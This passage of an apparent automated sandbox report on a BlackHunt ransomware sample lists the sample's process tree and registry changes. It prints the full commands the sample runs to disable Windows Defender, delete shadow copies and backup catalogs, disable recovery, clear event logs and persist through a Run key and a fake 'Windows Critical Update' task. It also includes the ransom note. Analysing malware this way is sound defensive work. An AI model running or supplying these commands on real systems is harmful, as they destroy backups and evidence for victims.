5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 100 PID 2924 wrote to memory of 2304 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 100 PID 2924 wrote to memory of 1640 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 99 PID 2924 wrote to memory of 1640 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 99 PID 2924 wrote to memory of 1988 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 105 PID 2924 wrote to memory of 1988 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 105 PID 4908 wrote to memory of 2164 4908 cmd.exe 106 PID 4908 wrote to memory of 2164 4908 cmd.exe 106 PID 2924 wrote to memory of 3304 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 107 PID 2924 wrote to memory of 3304 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 107 PID 3644 wrote to memory of 2612 3644 cmd.exe 198 PID 3644 wrote to memory of 2612 3644 cmd.exe 198 PID 1940 wrote to memory of 3532 1940 cmd.exe 147 PID 1940 wrote to memory of 3532 1940 cmd.exe 147 PID 3544 wrote to memory of 4764 3544 cmd.exe 197 PID 3544 wrote to memory of 4764 3544 cmd.exe 197 PID 1988 wrote to memory of 3488 1988 cmd.exe 111 PID 1988 wrote to memory of 3488 1988 cmd.exe 111 PID 1640 wrote to memory of 2148 1640 cmd.exe 110 PID 1640 wrote to memory of 2148 1640 cmd.exe 110 PID 2924 wrote to memory of 876 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 165 PID 2924 wrote to memory of 876 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 165 PID 2924 wrote to memory of 3244 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 113 PID 2924 wrote to memory of 3244 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 113 PID 852 wrote to memory of 5096 852 cmd.exe 115 PID 852 wrote to memory of 5096 852 cmd.exe 115 PID 2304 wrote to memory of 2552 2304 cmd.exe 195 PID 2304 wrote to memory of 2552 2304 cmd.exe 195 PID 2924 wrote to memory of 3044 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 194 PID 2924 wrote to memory of 3044 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 194 PID 876 wrote to memory of 3780 876 reg.exe 192 PID 876 wrote to memory of 3780 876 reg.exe 192 PID 3304 wrote to memory of 1704 3304 cmd.exe 116 PID 3304 wrote to memory of 1704 3304 cmd.exe 116 PID 2924 wrote to memory of 1560 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 191 PID 2924 wrote to memory of 1560 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 191 PID 3244 wrote to memory of 3484 3244 cmd.exe 189 PID 3244 wrote to memory of 3484 3244 cmd.exe 189 PID 2924 wrote to memory of 2108 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 117 PID 2924 wrote to memory of 2108 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 117 PID 3044 wrote to memory of 2340 3044 cmd.exe 120 PID 3044 wrote to memory of 2340 3044 cmd.exe 120 PID 2924 wrote to memory of 3060 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 118 PID 2924 wrote to memory of 3060 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 118 PID 1560 wrote to memory of 2692 1560 cmd.exe 122 PID 1560 wrote to memory of 2692 1560 cmd.exe 122 PID 2924 wrote to memory of 5016 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 121 PID 2924 wrote to memory of 5016 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 121 PID 2924 wrote to memory of 3580 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 161 PID 2924 wrote to memory of 3580 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 161 PID 2108 wrote to memory of 2104 2108 cmd.exe 124 PID 2108 wrote to memory of 2104 2108 cmd.exe 124 PID 2924 wrote to memory of 5112 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 160 PID 2924 wrote to memory of 5112 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 160 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe"C:\Users\Admin\AppData\Local\Temp\5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:5016
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4216
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f4⤵PID:3780
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4148
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3668
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:8672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4732
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:11352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4656
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4136
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4952
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3688
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4956
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4548
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3796
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:11996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4456
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe" /F2⤵PID:5072
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe" /F3⤵
- Creates scheduled task(s)
PID:7344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11620
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:10848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11656
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:11696
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:10780
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10884
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10980
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:11076
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:7172
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:13652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:11176
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:13740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:7300
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:12200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:8428
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:13952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:13536
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:13788
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:14036
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:26760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14056
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:7188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:14104
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:6340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:14156
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5700
-
-
-
